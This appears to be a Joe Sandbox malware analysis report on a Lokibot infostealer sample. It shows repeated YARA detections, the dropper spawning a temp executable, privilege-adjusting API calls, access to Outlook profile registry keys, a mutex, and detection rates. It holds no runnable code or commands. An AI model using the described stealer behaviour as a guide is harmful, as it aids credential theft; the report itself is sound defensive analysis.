Source: 2.0.cbgsujmwws.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.cbgsujmwws.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.cbgsujmwws.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.cbgsujmwws.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cbgsujmwws.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.0.cbgsujmwws.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.0.cbgsujmwws.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.cbgsujmwws.exe.9f0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.2.cbgsujmwws.exe.9f0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.cbgsujmwws.exe.9f0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cbgsujmwws.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.0.cbgsujmwws.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.0.cbgsujmwws.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cbgsujmwws.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.0.cbgsujmwws.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.0.cbgsujmwws.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cbgsujmwws.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.0.cbgsujmwws.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.0.cbgsujmwws.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cbgsujmwws.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.0.cbgsujmwws.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.0.cbgsujmwws.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cbgsujmwws.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.0.cbgsujmwws.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.0.cbgsujmwws.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.cbgsujmwws.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.0.cbgsujmwws.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.0.cbgsujmwws.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.cbgsujmwws.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.cbgsujmwws.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.cbgsujmwws.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group

Source: ypdTgfE0o8.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 2.0.cbgsujmwws.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.0.cbgsujmwws.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.0.cbgsujmwws.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.cbgsujmwws.exe.9f0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.cbgsujmwws.exe.9f0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cbgsujmwws.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.0.cbgsujmwws.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.0.cbgsujmwws.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cbgsujmwws.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.0.cbgsujmwws.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.0.cbgsujmwws.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.cbgsujmwws.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.cbgsujmwws.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.cbgsujmwws.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cbgsujmwws.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.0.cbgsujmwws.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.0.cbgsujmwws.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.cbgsujmwws.exe.9f0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 1.2.cbgsujmwws.exe.9f0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.cbgsujmwws.exe.9f0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cbgsujmwws.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.0.cbgsujmwws.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.0.cbgsujmwws.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cbgsujmwws.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.0.cbgsujmwws.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.0.cbgsujmwws.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cbgsujmwws.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.0.cbgsujmwws.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.0.cbgsujmwws.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cbgsujmwws.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.0.cbgsujmwws.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.0.cbgsujmwws.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cbgsujmwws.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.0.cbgsujmwws.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.0.cbgsujmwws.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.cbgsujmwws.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.0.cbgsujmwws.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.0.cbgsujmwws.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.cbgsujmwws.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.cbgsujmwws.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.cbgsujmwws.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe

Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004034F7

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe	Code function: 0_2_00406BFE	0_2_00406BFE
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 1_2_009E0A48	1_2_009E0A48
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 2_2_0040549C	2_2_0040549C
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 2_2_004029D4	2_2_004029D4

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: String function: 00405B6F appears 42 times

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe F340BF91627787A2770C897AA9555BB82382CDCC2232904B5707238AB0A85E39

Source: ypdTgfE0o8.exe	Virustotal: Detection: 41%
Source: ypdTgfE0o8.exe	ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe

File read: C:\Users\user\Desktop\ypdTgfE0o8.exe

Jump to behavior

Source: ypdTgfE0o8.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ypdTgfE0o8.exe "C:\Users\user\Desktop\ypdTgfE0o8.exe"
Source: C:\Users\user\Desktop\ypdTgfE0o8.exe	Process created: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process created: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny
Source: C:\Users\user\Desktop\ypdTgfE0o8.exe	Process created: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Process created: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe C:\Users\user\AppData\Local\Temp\jplmbcuny	Jump to behavior

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe	Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004034F7
Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe	Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,		2_2_0040650A

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe

File created: C:\Users\user\AppData\Local\Temp\nsf8A25.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/6@0/1

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ypdTgfE0o8.exe

Code function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404954

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: ypdTgfE0o8.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: cbgsujmwws.exe, 00000001.00000003.375462128.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, cbgsujmwws.exe, 00000001.00000003.378104668.0000000002250000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: cbgsujmwws.exe, 00000001.00000003.375462128.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, cbgsujmwws.exe, 00000001.00000003.378104668.0000000002250000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.cbgsujmwws.exe.9f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cbgsujmwws.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.cbgsujmwws.exe.9f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.cbgsujmwws.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cbgsujmwws.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.379321440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.381014375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.383613050.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.376381510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.633078380.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.378012888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
